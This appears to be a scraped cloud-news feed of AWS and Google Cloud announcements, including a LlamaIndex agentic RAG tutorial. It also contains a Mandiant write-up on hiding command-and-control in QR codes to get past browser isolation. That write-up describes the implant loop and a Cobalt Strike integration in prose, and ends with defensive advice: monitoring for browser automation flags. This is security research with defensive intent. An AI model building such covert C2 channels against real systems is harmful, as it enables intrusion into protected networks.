Developers often face challenges integrating structured data into generative AI applications. This includes difficulties training large language models (LLMs) to convert natural language queries to SQL queries based on complex database schemas, as well as ensuring appropriate data governance and security controls are in place. Bedrock Knowledge Bases eliminates these hurdles by providing a managed natural language to SQL (NL2SQL) module. A retail analyst can now simply ask “What were my top 5 selling products last month?”, and then Bedrock Knowledge Base automatically translates that query into SQL, execute the query against the database, and return the results – or even provide a summarized narrative response. To generate accurate SQL queries, Bedrock Knowledge Base leverages database schema, previous query history, and other contextual information that are provided about the data sources.

Bedrock Knowledge Bases supports structured data retrieval from Amazon Redshift and Amazon Sagemaker Lakehouse at this time and is available in all commercial regions where Bedrock Knowledge Bases is supported. To learn more, visit here and here. For details on pricing, please refer here.

Read More for the details.

2024 12 04

AWS – Amazon Bedrock Marketplace brings over 100 models to Amazon Bedrock

AWS, Cloud AWS

Amazon Bedrock Marketplace provides generative AI developers access to over 100 publicly available and proprietary foundation models (FMs), in addition to Amazon Bedrock’s industry-leading, serverless models. Customers deploy these models onto SageMaker endpoints where they can select their desired number of instances and instance types. Amazon Bedrock Marketplace models can be accessed through Bedrock’s unified APIs, and models which are compatible with Bedrock’s Converse APIs can be used with Amazon Bedrock’s tools such as Agents, Knowledge Bases, and Guardrails.

Amazon Bedrock Marketplace empowers generative AI developers to rapidly test and incorporate a diverse array of emerging, popular, and leading FMs of various types and sizes. Customers can choose from a variety of models tailored to their unique requirements, which can help accelerate the time-to-market, improve the accuracy, or reduce the cost of their generative AI workflows. For example, customers can incorporate models highly-specialized for finance or healthcare, or language translation models for Asian languages, all from a single place.

Amazon Bedrock Marketplace is supported in US East (N. Virginia), US East (Ohio), US West (Oregon), Asia Pacific (Mumbai), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Canada (Central), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Paris), and South America (São Paulo).

For more information, please refer to Amazon Bedrock Marketplace’s announcement blog or documentation.

Read More for the details.

2024 12 04

AWS – Amazon Bedrock announces preview of prompt caching

AWS, Cloud AWS

Today, AWS announces that Amazon Bedrock now supports prompt caching. Prompt caching is a new capability that can reduce costs by up to 90% and latency by up to 85% for supported models by caching frequently used prompts across multiple API calls. It allows you to cache repetitive inputs and avoid reprocessing context, such as long system prompts and common examples that help guide the model’s response. When cache is used, fewer computing resources are needed to generate output. As a result, not only can we process your request faster, but we can also pass along the cost savings from using fewer resources.

Amazon Bedrock is a fully managed service that offers a choice of high-performing FMs from leading AI companies via a single API. Amazon Bedrock also provides a broad set of capabilities customers need to build generative AI applications with security, privacy, and responsible AI capabilities built in. These capabilities help you build tailored applications for multiple use cases across different industries, helping organizations unlock sustained growth from generative AI while providing tools to build customer trust and data governance.

Prompt caching is now available on Claude 3.5 Haiku and Claude 3.5 Sonnet v2 in US West (Oregon) and US East (N. Virginia) via cross-region inference, and Nova Micro, Nova Lite, and Nova Pro models in US East (N. Virginia). At launch, only a select number of customers will have access to this feature. To learn more about participating in the preview, see this page. To learn more about prompt caching, see our documentation and blog.

Read More for the details.

2024 12 04

AWS – Amazon Bedrock Data Automation now available in preview

AWS, Cloud AWS

Today, we are announcing the preview launch of Amazon Bedrock Data Automation (BDA), a new feature of Amazon Bedrock that enables developers to automate the generation of valuable insights from unstructured multimodal content such as documents, images, video, and audio to build GenAI-based applications. These insights include video summaries of key moments, detection of inappropriate image content, automated analysis of complex documents, and much more. Developers can also customize BDA’s output to generate specific insights in consistent formats required by their systems and applications.

By leveraging BDA, developers can reduce development time and effort, making it easier to build intelligent document processing, media analysis, and other multimodal data-centric automation solutions. BDA offers high accuracy at lower cost than alternative solutions, along with features such as visual grounding with confidence scores for explainability and built-in hallucination mitigation. This ensures accurate insights from unstructured, multi-modal data content. Developers can get started with BDA on the Bedrock console, where they can configure and customize output using their sample data. They can then integrate BDA’s unified multi-modal inference API into their applications to process their unstructured content at scale with high accuracy and consistency. BDA is also integrated with Bedrock Knowledge Bases, making it easier for developers to generate meaningful information from their unstructured multi-modal content to provide more relevant responses for retrieval augmented generation (RAG).

Bedrock Data Automation is available in preview in US West (Oregon) AWS Region.

To learn more, visit the Bedrock Data Automation page.

Read More for the details.

2024 12 04

AWS – Amazon Bedrock Guardrails supports multimodal toxicity detection for image content (Preview)

AWS, Cloud AWS

Organizations are increasingly using applications with multimodal data to drive business value, improve decision-making, and enhance customer experiences. Amazon Bedrock Guardrails now supports multimodal toxicity detection for image content, enabling organizations to apply content filters to images. This new capability with Guardrails, now in public preview, removes the heavy lifting required by customers to build their own safeguards for image data or spend cycles with manual evaluation that can be error-prone and tedious.

Bedrock Guardrails helps customers build and scale their generative AI applications responsibly for a wide range of use cases across industry verticals including healthcare, manufacturing, financial services, media and advertising, transportation, marketing, education, and much more. With this new capability, Amazon Bedrock Guardrails offers a comprehensive solution, enabling the detection and filtration of undesirable and potentially harmful image content while retaining safe and relevant visuals. Customers can now use content filters for both text and image data in a single solution with configurable thresholds to detect and filter undesirable content across categories such as hate, insults, sexual, and violence, and build generative AI applications based on their responsible AI policies.

This new capability in preview is available with all foundation models (FMs) on Amazon Bedrock that support images including fine-tuned FMs in 11 AWS regions globally: US East (N. Virginia), US East (Ohio), US West (Oregon), Europe (Ireland), Europe (Frankfurt), Europe (London), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Tokyo), and Asia Pacific (Mumbai), and AWS GovCloud (US-West).

To learn more, visit the Amazon Bedrock Guardrails product page, read the News blog, and documentation.

Read More for the details.

2024 12 04

AWS – Amazon Q Developer can now guide SageMaker Canvas users through ML development

AWS, Cloud AWS

Starting today, you can build ML models using natural language with Amazon Q Developer, now available in Amazon SageMaker Canvas in preview. You can now get generative AI-powered assistance through the ML lifecycle, from data preparation to model deployment. With Amazon Q Developer, users of all skill levels can use natural language to access expert guidance to build high-quality ML models, accelerating innovation and time to market.

Amazon Q Developer will break down your objective into specific ML tasks, define the appropriate ML problem type, and apply data preparation techniques to your data. Amazon Q Developer then guides you through the process of building, evaluating, and deploying custom ML models. ML models produced in SageMaker Canvas with Amazon Q Developer are production ready, can be registered in SageMaker Studio, and the code can be shared with data scientists for integration into downstream MLOps workflows.

Amazon Q Developer is available in SageMaker Canvas in preview in the following AWS Regions: US East (N. Virginia), US West (Oregon), Europe (Frankfurt), Europe (Paris), Asia Pacific (Tokyo), and Asia Pacific (Seoul). To learn more about using Amazon Q Developer with SageMaker Canvas, visit the website, read the AWS News blog, or view the technical documentation.

Read More for the details.

2024 12 04

AWS – AWS Education Equity Initiative to boost education for underserved learners

AWS, Cloud AWS

Amazon announces a five-year commitment of cloud technology and technical support for organizations creating digital learning solutions that expand access for underserved learners worldwide through the AWS Education Equity Initiative. While the use of educational technologies continues to rise, many organizations lack access to cloud computing and AI resources needed to accelerate and scale their work to reach more learners in need.

Amazon is committing up to $100 million in AWS credits and technical advising to support socially-minded organizations build and scale learning solutions that utilize cloud and AI technologies. This will help reduce initial financial barriers and provide guidance on building and scaling AI-powered education solutions using AWS technologies.

Eligible recipients, including socially-minded edtechs, social enterprises, non-profits, governments, and corporate social responsibility teams, must demonstrate how their solution will benefit students from underserved communities. The initiative is now accepting applications.

To learn more and how to apply, visit the AWS Education Equity Initiative page.

Read More for the details.

2024 12 04

AWS – Announcing new AWS AI Service Cards to advance responsible generative AI

AWS, Cloud AWS

Today, AWS announces the availability of new AWS AI Service Cards for Amazon Nova Reel; Amazon Canvas; Amazon Nova Micro, Lite, and Pro; Amazon Titan Image Generator; and Amazon Titan Text Embeddings. AI Service Cards are a resource designed to enhance transparency by providing customers with a single place to find information on the intended use cases and limitations, responsible AI design choices, and performance optimization best practices for AWS AI services.

AWS AI Service Cards are part of our comprehensive development process to build services in a responsible way. They focus on key aspects of AI development and deployment, including fairness, explainability, privacy and security, safety, controllability, veracity and robustness, governance, and transparency. By offering these cards, AWS aims to empower customers with the knowledge they need to make informed decisions about using AI services in their applications and workflows. Our AI Service Cards will continue to evolve and expand as we engage with our customers and the broader community to gather feedback and continually iterate on our approach.

For more information, see the AI Service Cards for

To learn more about AI Service Cards, as well as our broader approach to building AI in a responsible way, see our Responsible AI webpage.

Read More for the details.

2024 12 04

GCP – Build agentic RAG on Google Cloud databases with LlamaIndex

Cloud, Google Cloud gcp

AI agents are revolutionizing the landscape of gen AI application development. Retrieval augmented generation (RAG) has significantly enhanced the capabilities of large language models (LLMs), enabling them to access and leverage external data sources such as databases. This empowers LLMs to generate more informed and contextually relevant responses. Agentic RAG represents a significant leap forward, combining the power of information retrieval with advanced action planning capabilities. AI agents can execute complex tasks that involve multiple steps that reason, plan and make decisions, and then take actions to execute goals over multiple iterations. This opens up new possibilities for automating intricate workflows and processes, leading to increased efficiency and productivity.

LlamaIndex has emerged as a leading framework for building knowledge-driven and agentic systems. It offers a comprehensive suite of tools and functionality that facilitate the development of sophisticated AI agents. Notably, LlamaIndex provides both pre-built agent architectures that can be readily deployed for common use cases, as well as customizable workflows, which enable developers to tailor the behavior of AI agents to their specific requirements.

Today, we’re excited to announce a collaboration with LlamaIndex on open-source integrations for Google Cloud databases including AlloyDB for PostgreSQL and Cloud SQL for PostgreSQL.

These LlamaIndex integrations, available to download via PyPi llama-index-alloydb-pg and llama-index-cloud-sq-pg, empower developers to build agentic applications that can connect with Google databases. The integrations include:

Integrations	Description	Link to documentation on GitHub
LlamaIndex Vector Store	Stores vector embeddings of the content and retrieves semantically similar vectors to queries	AlloyDB , Cloud SQL for PostgreSQL
LlamaIndex Document Store	Stores the content related to the vectors in the vector store	AlloyDB , Cloud SQL for PostgreSQL
LlamaIndex Index Store	Stores metadata about the content in your document store	AlloyDB , Cloud SQL for PostgreSQL

In addition, developers can also access previously published LlamaIndex integrations for Firestore, including for Vector Store and Index Store.

Integration benefits

LlamaIndex supports a broad spectrum of different industry use cases, including agentic RAG, report generation, customer support, SQL agents, and productivity assistants. LlamaIndex’s multi-modal functionality extends to applications like retrieval-augmented image captioning, showcasing its versatility in integrating diverse data types. Through these use cases, joint customers of LlamaIndex and Google Cloud databases can expect to see an enhanced developer experience, complete with:

Streamlined knowledge retrieval: Using these packages makes it easier for developers to build knowledge-retrieval applications with Google databases. Developers can leverage AlloyDB and Cloud SQL vector stores to store and semantically search unstructured data to provide models with richer context. The LlamaIndex vector store integrations let you filter metadata effectively, select from vector similarity strategies, and help improve performance with custom vector indexes.
Complex document parsing: LlamaIndex’s first-class document parser, LlamaParse, converts complex document formats with images, charts and rich tables into a form more easily understood by LLMs; this produces demonstrably better results for LLMs attempting to understand the content of these documents.
Secure authentication and authorization: LlamaIndex integrations to Google databases utilize the principle of least privilege, a best practice, when creating database connection pools, authenticating, and authorizing access to database instances.
Fast prototyping: Developers can quickly build and set up agentic systems with readily available pre-built agent and tool architectures on LlamaHub.
Flow control: For production use cases, LlamaIndex Workflows provide the flexibility to build and deploy complex agentic systems with granular control of conditional execution, as well as powerful state management.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3e61ee34f490>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>

A report generation use case

Agentic RAG workflows are moving beyond simple question and answer chatbots. Agents can synthesize information from across sources and knowledge bases to generate in-depth reports. Report generation spans across many industries — from legal, where agents can do prework such as research, to financial services, where agents can analyze earning call reports. Agents mimic experts that sift through information to generate insights. And even if agent reasoning and retrieval takes several minutes, automating these reports can save teams several hours.

LlamaIndex provides all the key components to generate reports:

Structured output definitions with the ability to organize outputs into Report templates
Intelligent document parsing to easily extract and chunk text and other media
Knowledge base storage and integration across the customer’s ecosystem
Agentic workflows to define tasks and guide agent reasoning

Now let’s see how these concepts work, and consider how to build a report generation agent that provides daily updates on new research papers about LLMs and RAG.

1. Prepare data: Load and parse documents

The key to any RAG workflow is ensuring a well-created knowledge base. Before you store the data, you need to ensure it is clean and useful. Data for the knowledge bases can come from your enterprise data or other sources. To generate reports for top research articles, developers can use the Arxiv SDK to pull free, open-access publications.

code_block: <ListValue: [StructValue([(‘code’, ‘import arxivrnrnrnclient = arxiv.Client()rnsearch = arxiv.Search(rn query = “RAG”,rn max_results = 5,rn sort_by = arxiv.SortCriterion.SubmittedDatern)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e61ee34f700>)])]>

But rather than use the ArxivReader to load and convert articles to plain text, LlamaParse supports varying paper formats, tables, and multimodal media leading to improved accuracy of document parsing.

code_block: <ListValue: [StructValue([(‘code’, ‘parser = LlamaParse(rn api_key=”llx-…”,rn result_type=”markdown”, rn num_workers=2,rn)rnrndocument = parser.load_data(pdf_file)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e61ee34f250>)])]>

To improve the knowledge base’s effectiveness, we recommend adding metadata to documents. This allows for advanced filtering or support for additional tooling. Learn more about metadata extraction.

2. Create a knowledge base: storage data for retrieval

Now, the data needs to be saved for long-term use. The LlamaIndexGoogle Cloud database integrations support storage and retrieval of a growing knowledge base.

2.1. Create a secure connection to the AlloyDB or Cloud SQL database

Utilize the AlloyDBEngine class to easily create a shareable connection pool that securely connects to your PostgreSQL instance.

code_block: <ListValue: [StructValue([(‘code’, ‘from llama_index_alloydb_pg import AlloyDBEnginernrnengine = await AlloyDBEngine.afrom_instance(rn project_id=PROJECT_ID,rn region=REGION,rn cluster=CLUSTER,rn instance=INSTANCE,rn database=DATABASE,rn)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e61ee34fee0>)])]>

Create only the necessary tables needed for your knowledge base. Creating separate tables reduces the level of access permissions that your agent needs. You can also specify a special “publication_date” metadata column that you can filter on later.

code_block: <ListValue: [StructValue([(‘code’, ‘await engine.ainit_doc_store_table(rn table_name=”llama_doc_store”,rn vector_size=768rn)rnrnawait engine.ainit_index_store_table(rn table_name=”llama_index_store”,rn vector_size=768rn)rnrnawait engine.ainit_vector_store_table(rn table_name=”llama_vector_store”,rn vector_size=768,rn metadata_columns=[Column(“publication_date”, “DATE”)],rn)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e61ee34f0a0>)])]>

Optional: Set up a Google Cloud embedding model. The knowledge base utilizes vector embeddings to search for semantically similar text.

code_block: <ListValue: [StructValue([(‘code’, ‘import google.authrnrnfrom llama_index.core import Settingsrnfrom llama_index.embeddings.vertex import VertexTextEmbeddingrnrnrncredentials, project_id = google.auth.default()rnSettings.embed_model = VertexTextEmbedding(rn model_name=”textembedding-gecko@003″,rn project=PROJECT_ID,rn credentials=credentialsrn)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e61ee34fe80>)])]>

2.2. Customize the underlying storage with the Document Store, Index Store, and Vector Store. For the vector store, specify the metadata field “publication_date” that you created previously.

code_block: <ListValue: [StructValue([(‘code’, ‘from llama_index.core import StorageContextrnfrom llama_index_alloydb_pg import AlloyDBVectorStore, AlloyDBDocumentStore, AlloyDBIndexStorernrnvector_store = await AlloyDBVectorStore.create(rn engine=engine,rn table_name=”llama_vector_store”,rn metadata_columns=[“publication_date”],rn)rnrndoc_store = await AlloyDBDocumentStore.create(rn engine=engine,rn table_name=”llama_doc_store”,rn)rnindex_store = await AlloyDBIndexStore.create(rn engine=engine,rn table_name=”llama_index_store”,rn)rnrnstorage_context = StorageContext.from_defaults(rn docstore=docstore, rn index_store=index_store,rn vector_store=vector_storern)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e61ee34f3d0>)])]>

2.3 Add the parsed documents to the knowledge base and build a Vector Store Index.

code_block: <ListValue: [StructValue([(‘code’, ‘from llama_index.core import VectorStoreIndex,rnrnrnindex = VectorStoreIndex.from_documents(rn documents, storage_context=storage_context, show_progress=Truern)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e61ee34feb0>)])]>

You can use other LlamaIndex index types like a Summary Index as additional tools to query and combine data.

code_block: <ListValue: [StructValue([(‘code’, ‘from llama_index.core import SummaryIndexrnrnsummary_index = SummaryIndex.from_documents(documents, storage_context=storage_context)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e61ee34f130>)])]>

2.4. Create tools from indexes to be used by the agent.

code_block: <ListValue: [StructValue([(‘code’, ‘search_tool = QueryEngineTool.from_defaults(rn query_engine=index.as_query_engine(),rn description=”Useful for retrieving specific snippets from research publications.”,rn)rnrnsummary_tool = = QueryEngineTool.from_defaults(rn query_engine=summary_tool.as_query_engine(),rn description=”Useful for questions asking questions about research publications.”,rn)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e61ee34f070>)])]>

3. Prompt: create an outline for the report

Reports may have requirements on sections and formatting. The agent needs instructions for formatting. Here is an example outline of a report format:

code_block: <ListValue: [StructValue([(‘code’, ‘outline=”””rn# DATE Daily report: TOPICrnrn## Executive Summaryrnrn## Top Challenges / Description of problemsrnrn## Summary of papersrnrn| Title | Authors | Summary | Links |rn| —– | ——- | ——- | —– |rn|LOTUS: Enabling Semantic Queries with LLMs Over Tables of Unstructured and Structured Data | Liana Patel, Siddharth Jha, Carlos Guestrin, Matei Zaharia | … | https://arxiv.org/abs/2407.11418v1 |rn”””‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e61ee34fdf0>)])]>

4. Define the workflow: outline agentic steps

Next, you define the workflow to guide the agent’s actions. For this example workflow, the agent tries to reason what tool to call: summary tools or the vector search tool. Once the agent has reasoned it doesn’t need additional data, it can exit out of the research loop to generate a report.

LlamaIndex Workflows provides an easy to use SDK to build any type of workflow:

code_block: <ListValue: [StructValue([(‘code’, ‘from llama_index.core.workflow import Workflow, StartEvent, StopEvent, Context, steprnfrom llama_index.llms.vertex import Vertexrnrnrnclass QueryEvent(Event):rn question: strrnrnclass SummaryEvent(Event):rn tool_call: ToolSelectionrnrnclass SearchEvent(Event):rn tool_call: ToolSelectionrnrnclass ReportGenerationEvent(Event):rn passrnrnrnclass ReportGenerationAgent(Workflow):rn “””Report generation agent.”””rnrn def __init__(rn self,rn search_tool: BaseTool,rn summary_tool: BaseTool,rn llm: FunctionCallingLLM | None = None,rn outline: str,rn **kwargs: Any,rn ) -> None:rn super().__init__(**kwargs)rn self.search_tool = search_toolrn self.summary_tool = summary_toolrn self.llm = llm rn self.outline = outlinern self.memory = ChatMemoryBuffer.from_defaults(llm=llm)rnrn @steprn async def query(self, ctx: Context, ev: StartEvent) -> QueryEvent:rn ctx.data[“contents”] = []rn ctx.data[“query”] = ev.queryrn self.memory.put(ev.query)rn return QueryEvent(chat_history=self.memory.get())rn rn @step(pass_context=True)rn async def router(rn self, ctx: Context, ev: QueryEventrn ) -> SummaryEvent | SearchEvent | ReportGenerationEvent | StopEvent:rn chat_history = ev.chat_historyrnrn response = await self.llm.achat_with_tools(rn [self.search_tool, self.summary_tool],rn chat_history=chat_history,rn )rnrn if ….:rn return ReportGenerationEvent()rnrn if …:rn return SummaryEvent()rn elif …:rn return SearchEvent()rn else:rn return StopEvent(result={“response”: “Invalid tool.”})rnrn @step(pass_context=True)rn async def handle_retrieval(rn self, ctx: Context, ev: SummaryEvent | SearchEventrn ) -> QueryEvent:rnt if ….:rn return self.summary_tool(query)rnrn if …:rn return self.search_tool(query)rnrn return QueryEvent(chat_history=self.memory.get())rn rnrn def format_report(contents):rnt”””Format report utility helper”””rn …rn return report rn rn @step(pass_context=True)rn async def generate_report(rn self, ctx: Context, ev: ReportGenerationEventrn ) -> StopEvent:rn “””Generate report.”””rn report = self.format_report(ctx.data[“contents”])rn return StopEvent(result={“response”: report})rnrnrnagent = ReportGenerationAgent(rn search_tool=search_tool,rn summary_tool=summary_tool,rn llm=Vertex(model=”gemini-pro”),rn outline=outlinern)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e61ee34fb80>)])]>

5. Generate reports: run the agent

Now that you’ve set up a knowledge base and defined an agent, you can set up automation to generate a report!

code_block: <ListValue: [StructValue([(‘code’, ‘query = “What are the recently published RAG techniques”rnreport = await agent.run(query=query)rnrn# Save the reportrnwith open(“report.md”, “w”) as f:rn f.write(report[‘response’])’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e61ee34fa90>)])]>

There you have it! A complete report that summarizes recent research in LLM and RAG techniques. How easy was that?

Get started today

In short, these LlamaIndex integrations with Google Cloud databases enables application developers to leverage the data in their operational databases to easily build complex agentic RAG workflows. This collaboration supports Google Cloud’s long-term commitment to be an open, integrated, and innovative database platform. With LlamaIndex’s extensive user base, this integration further expands the possibilities for developers to create cutting-edge, knowledge-driven AI agents.

Ready to get started? Take a look at the following Notebook-based tutorials:

AlloyDB

Cloud SQL for PostgreSQL

Find all information on GitHub at github.com/googleapis/llama-index-cloud-sql-pg-python and github.com/googleapis/llama-index-alloydb-pg-python.

Read More for the details.

2024 12 04

GCP – (QR) Coding My Way Out of Here: C2 in Browser Isolation Environments

Cloud, Google Cloud gcp

Written by: Thibault Van Geluwe de Berlaere

Executive Summary

Browser isolation is a security technology where web browsing activity is separated from the user’s local device by running the browser in a secure environment, such as a cloud server or a virtual machine, and then streaming the visual content to the user’s device.
Browser isolation is often used by organizations to combat phishing threats, protect the device from browser-delivered attacks, and deter typical command-and-control (C2 or C&C) tactics used by attackers.
In this blog post, Mandiant demonstrates a novel technique that can be used to circumvent all three current types of browser isolation (remote, on-premises, and local) for the purpose of controlling a malicious implant via C2. Mandiant shows how attackers can use machine-readable QR codes to send commands from an attacker-controlled server to a victim device.

Background on Browser Isolation

The great folks at SpecterOps released a blog post earlier this year on browser isolation and how penetration testers and red team operators may work around browser isolation scenarios for ingress tool transfer, egress data transfer, and general bypass techniques. In summary, browser isolation protects users from web-based attacks by sandboxing the web browser in a secure environment (either local or remote) and streaming the visual content back to the user’s local browser. The experience is (ideally) fully transparent to the end user. According to most documentation, three types of browser isolation exist:

Remote browser isolation (RBI), the most secure and the most common variant, sandboxes the browser in a cloud-based environment.
On-premises browser isolation is similar to RBI but runs the sandboxed browser on-premises. The advantage of this approach is that on-premises web-based applications can be accessed without requiring complex cloud-to-on-premises connectivity.
Local browser isolation, or client-side browser isolation, runs the sandboxed browser in a local containerized or virtual machine environment ( e.g., Docker or Windows Sandbox).

The remote browser handles everything from page rendering to executing JavaScript. Only the visual appearance of the web page is sent back to the user’s local browser (a stream of pixels). Keypresses and clicks in the local browser are forwarded to the remote browser, allowing the user to interact with the web application. Organizations often use proxies to ensure all web traffic is served through the browser isolation technology, thereby limiting egress network traffic and restricting an attacker’s ability to bypass the browser isolation.

SpecterOps detailed some of the challenges that offensive security professionals face when operating in browser isolation environments. They document possible approaches on how to circumvent browser isolation by abusing misconfigurations, such as using HTTP headers, cookies, or authentication parameters to bypass the isolation features.

Browser Isolation Prevents Typical Command-and-Control

Command and control (C2 or C&C) refers to an attacker’s ability to remotely control compromised systems via malicious implants. The most common channel to send commands to and from a victim device is through HTTP requests:

The implant requests a command from the attacker-controlled C2 server through an HTTP request (e.g., in the HTTP parameters, headers, or request body).
The C2 server returns the command to execute in the HTTP response (e.g., in headers or response body).
The implant decodes the HTTP response and executes the command.
The implant submits the command output back to the C2 server with another HTTP request.
The implant “sleeps” for a while, then repeats the cycle.

However, this approach presents challenges when browser isolation is in use—when making HTTP requests through a browser isolation system, the HTTP response returned to the local browser only contains the streaming engine to render the remote browser’s visual page contents. The original HTTP response (from the web server) is only available in the remote browser. The HTTP response is rendered in the remote browser, and only a stream of pixels is sent to the local browser to visually render the web page. This prevents typical HTTP-based C2 because the local device cannot decode the HTTP response (step 3).

Figure 1: Sequence diagram of browser isolation HTTP request lifecycle

In this blog post, we will explore a different approach to achieving C2 with compromised systems in browser isolation environments, working entirely within the browser isolation context.

Sending C2 Data Through Pixels

Mandiant’s Red Team developed a novel solution to this problem. Instead of returning the C2 data in the HTTP request headers or body, the C2 server returns a valid web page that visually shows a QR code. The implant then uses a local headless browser (e.g., using Selenium) to render the page, grabs a screenshot, and reads the QR code to retrieve the embedded data. By taking advantage of machine-readable QR codes, an attacker can send data from the attacker-controlled server to a malicious implant even when the web page is rendered in a remote browser.

Figure 2: Sequence diagram of C2 via QR codes

Instead of decoding the HTTP response for the command to execute; the implant visually renders the web page (from the browser isolation’s pixel streaming engine) and decodes the command from the QR code displayed on the page. The new C2 loop is as follows:

The implant controls a local headless browser via the DevTools protocol.
The implant retrieves the web page from the C2 server via the headless browser. This request is forwarded to the remote (isolated) browser and ultimately lands on the C2 server.
The C2 server returns a valid HTML web page with the command data encoded in a QR code (visually shown on the page).
The remote browser returns the pixel streaming engine back to the local browser, starting a visual stream showing the rendered web page obtained from the C2 server.
The implant waits for the page to fully render, then grabs a screenshot of the local browser. This screenshot contains the QR code.
The implant uses an embedded QR scanning library to read the QR code data from the screenshot, thereby obtaining the embedded data.
The implant executes the command on the compromised device.
The implant (again through the local browser) navigates to a new URL that includes the command output encoded in a URL parameter. This parameter is passed through to the remote browser and ultimately to the C2 server (after all, in legitimate cases, the URL parameters may be required to return the correct web page).The C2 server can decode the command output as in traditional HTTP-based C2.
The implant “sleeps” for a while, then repeats the cycle.

Mandiant developed a proof-of-concept (PoC) implant using Puppeteer and the Google Chrome browser in headless mode (though any modern browser could be used). We even went a step further and integrated the implant with Cobalt Strike’s External C2 feature, allowing the use of Cobalt Strike’s BEACON implant while communicating over HTTP requests and QR code responses.

Figure 3: Demo of C2 through QR codes in browser isolation scenarios (Chrome browser window would be hidden in real-world applications)

Because this technique relies on the visual content of the web page, it works in all three browser isolation types (remote, on-premises, and local).

While the PoC demonstrated the feasibility of this technique, there are some considerations and drawbacks:

During Mandiant’s testing, using QR codes with the maximum data size (2,953 bytes, 177×177 grid, Error Correction Level “L”) was infeasible as the visual stream of the web page rendered in the local browser was of insufficient quality to reliably read the QR code contents. Mandiant was forced to fall back to QR codes containing a maximum of 2,189 bytes of content. Note: QR codes can store up to 2953 bytes per instance, depending on the Error Correction Level (ECL). Higher ECL settings make the QR code more easily readable, but reduce the maximum data size.
Due to the overhead of using Chrome in headless mode, the remote browser startup time, the page rendering requirements, and the stream of visual content from the remote browser back to the local browser, each request takes ~5s to reliably show and scan the QR code. This introduces significant latency in the C2 channel. For example, at the time of writing, a BEACON payload is ~323 KiB. At 2,189 bytes per QR code and 5s per request, a full BEACON payload is transferred in approximately 12m20s (~438 bytes/s, assuming every QR code can be successfully scanned and every network request goes through seamlessly).While this throughput is certainly sufficient for typical C2 operations, some techniques (e.g., SOCKS proxying) become infeasible.
Other security features of browser isolation, such as domain reputation, URL scanning, data loss prevention, and request heuristics, are not considered in this blog post. Offensive security professionals will have to overcome these protection measures as well when operating in browser isolation environments.

Conclusion and Recommendations

In this blog post, Mandiant demonstrated a novel technique to establish C2 when faced with browser isolation. While this technique proves that browser isolation technologies have weaknesses, Mandiant still recommends browser isolation as a strong protection measure against other types of attacks (e.g., client-side browser exploitation, phishing, etc). Organizations should not solely rely on browser isolation to protect themselves from web-based threats, but rather embrace the “defense in depth” strategy and establish a well-rounded cyber defense posture. Mandiant recommends the following controls:

Monitor for anomalous network traffic: Even when using browser isolation, organizations should inspect network traffic and monitor for anomalous usage. The C2 method described in this post is low-bandwidth, hence transferring even small datasets will require many HTTP requests.
Monitor for browsers in automation mode: Organizations can monitor when browsers are used in automation mode (as shown in the video above) by inspecting the process command line. Chromium-based browsers use flags such as --enable-automation and --remote-debugging-port to enable other processes to control the browser through the DevTools protocol. Organizations can monitor for these flags during process creation.

Through numerous adversarial emulation engagements and Red Team and Purple Team assessments, Mandiant has gained an in-depth understanding of the unique paths attackers may take in compromising their targets. Review our Technical Assurance services and contact us for more information.

Read More for the details.

2024 12 03

AWS – Announcing Amazon S3 Metadata (Preview) – Easiest and fastest way to manage your metadata

AWS, Cloud AWS

Amazon S3 Metadata is the easiest and fastest way to help you instantly discover and understand your S3 data with automated, easily-queried metadata that updates in near real-time. This helps you to curate, identify, and use your S3 data for business analytics, real-time inference applications, and more. S3 Metadata supports object metadata, which includes system-defined details like size and the source of the object, and custom metadata, which allows you to use tags to annotate your objects with information like product SKU, transaction ID, or content rating, for example.

S3 Metadata is designed to automatically capture metadata from objects as they are uploaded into a bucket, and to make that metadata queryable in a read-only table. As data in your bucket changes, S3 Metadata updates the table within minutes to reflect the latest changes. These metadata tables are stored in S3 Tables, the new S3 storage offering optimized for tabular data. S3 Tables integration with AWS Glue Data Catalog is in preview, allowing you to stream, query, and visualize data—including S3 Metadata tables—using AWS Analytics services such as Amazon Data Firehose, Athena, Redshift, EMR, and QuickSight. Additionally, S3 Metadata integrates with Amazon Bedrock, allowing for the annotation of AI-generated videos with metadata that specifies its AI origin, creation timestamp, and the specific model used for its generation.

Amazon S3 Metadata is currently available in preview in the US East (N. Virginia), US East (Ohio), and US West (Oregon) Regions, and coming soon to additional Regions. For pricing details, visit the S3 pricing page. To learn more, visit the product page, documentation, and AWS News Blog.

Read More for the details.

2024 12 03

AWS – Amazon DynamoDB global tables previews multi-Region strong consistency

AWS, Cloud AWS

Starting today in preview, Amazon DynamoDB global tables now supports multi-Region strong consistency. DynamoDB global tables is a fully managed, serverless, multi-Region, and multi-active database used by tens of thousands of customers. With this new capability, you can now build highly available multi-Region applications with a Recovery Point Objective (RPO) of zero, achieving the highest level of resilience.

Multi-Region strong consistency ensures your applications can always read the latest version of data from any Region in a global table, removing the undifferentiated heavy lifting of managing consistency across multiple Regions. It is useful for building global applications with strict consistency requirements, such as user profile management, inventory tracking, and financial transaction processing.

